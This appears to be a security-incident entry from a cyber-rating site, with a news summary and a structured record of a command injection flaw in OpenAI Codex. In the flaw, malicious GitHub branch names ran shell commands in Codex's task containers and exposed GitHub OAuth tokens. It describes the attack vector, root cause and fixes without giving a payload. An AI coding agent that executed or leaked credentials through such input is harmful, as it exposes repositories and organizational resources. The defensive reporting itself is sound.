OpenAI Codex Vulnerability Exposed GitHub Tokens via Command Injection
A critical security flaw in OpenAI’s Codex an AI-powered coding assistant integrated with GitHub could have allowed attackers to steal GitHub OAuth tokens through a command injection vulnerability. The issue stemmed from improper handling of branch names during task execution, enabling malicious actors to inject arbitrary shell commands into containerized environments where Codex operates.
Researchers demonstrated that the flaw could be exploited to extract short-lived GitHub tokens, which are used to authenticate repository access. These tokens could then be exposed via task outputs or external network requests, granting attackers potential access to sensitive organizational resources. The vulnerability extended beyond the web interface, affecting CLI tools, SDKs, and IDE integrations, where locally stored credentials could be leveraged to reproduce the attack.
The risk was particularly acute in enterprise environments, where Codex often has broad permissions across multiple repositories. By embedding malicious payloads in GitHub branch names, an attacker with repository access could compromise multiple users interacting with the same project, enabling lateral movement within GitHub and large-scale exploitation.
OpenAI has since patched the vulnerability, implementing stricter input validation, shell escaping protections, and tighter token controls to mitigate exposure. The company also reduced token scope and lifetime during task execution. The incident underscores the growing security challenges of AI-driven development tools, which operate as live execution environments with access to sensitive credentials. As AI agents become more embedded in developer workflows, securing their containerized environments and input processing will require the same rigor as traditional application security boundaries.
OpenAI cybersecurity rating report: https://www.rankiteo.com/company/openai
GitHub cybersecurity rating report: https://www.rankiteo.com/company/github
"id": "OPEGIT1774889403",
"linkid": "openai, github",
"type": "Vulnerability",
"date": "3/2026",
"severity": "85",
"impact": "4",
"explanation": "Attack with significant impact with customers data leaks"
{'affected_entities': [{'customers_affected': 'Enterprise users of OpenAI '
'Codex with GitHub integration',
'industry': 'Artificial Intelligence',
'name': 'OpenAI',
'type': 'Technology Company'},
{'customers_affected': 'Users with repositories '
'accessed via OpenAI Codex',
'industry': 'Technology',
'name': 'GitHub',
'type': 'Software Development Platform'}],
'attack_vector': 'Malicious branch names in GitHub repositories',
'data_breach': {'data_exfiltration': 'Potential exposure via task outputs or '
'external network requests',
'sensitivity_of_data': 'High (authentication tokens for '
'repository access)',
'type_of_data_compromised': 'GitHub OAuth tokens'},
'description': 'A critical security flaw in OpenAI’s Codex, an AI-powered '
'coding assistant integrated with GitHub, could have allowed '
'attackers to steal GitHub OAuth tokens through a command '
'injection vulnerability. The issue stemmed from improper '
'handling of branch names during task execution, enabling '
'malicious actors to inject arbitrary shell commands into '
'containerized environments where Codex operates. Researchers '
'demonstrated that the flaw could be exploited to extract '
'short-lived GitHub tokens, which could then be exposed via '
'task outputs or external network requests, granting attackers '
'potential access to sensitive organizational resources. The '
'vulnerability affected CLI tools, SDKs, and IDE integrations, '
'where locally stored credentials could be leveraged to '
'reproduce the attack. The risk was particularly acute in '
'enterprise environments, where Codex often has broad '
'permissions across multiple repositories.',
'impact': {'brand_reputation_impact': 'Potential reputational damage due to '
'security flaw in AI-driven development '
'tool',
'data_compromised': 'GitHub OAuth tokens',
'operational_impact': 'Potential unauthorized access to sensitive '
'organizational resources',
'systems_affected': ['CLI tools',
'SDKs',
'IDE integrations',
'Containerized environments']},
'lessons_learned': 'The incident underscores the growing security challenges '
'of AI-driven development tools, which operate as live '
'execution environments with access to sensitive '
'credentials. Securing their containerized environments '
'and input processing requires the same rigor as '
'traditional application security boundaries.',
'post_incident_analysis': {'corrective_actions': 'Stricter input validation, '
'shell escaping protections, '
'tighter token controls, '
'reduced token scope and '
'lifetime',
'root_causes': 'Improper handling of branch names '
'during task execution in '
'containerized environments'},
'response': {'containment_measures': 'Stricter input validation, shell '
'escaping protections, tighter token '
'controls',
'remediation_measures': 'Reduced token scope and lifetime during '
'task execution'},
'title': 'OpenAI Codex Vulnerability Exposed GitHub Tokens via Command '
'Injection',
'type': 'Command Injection',
'vulnerability_exploited': 'Improper handling of branch names during task '
'execution'}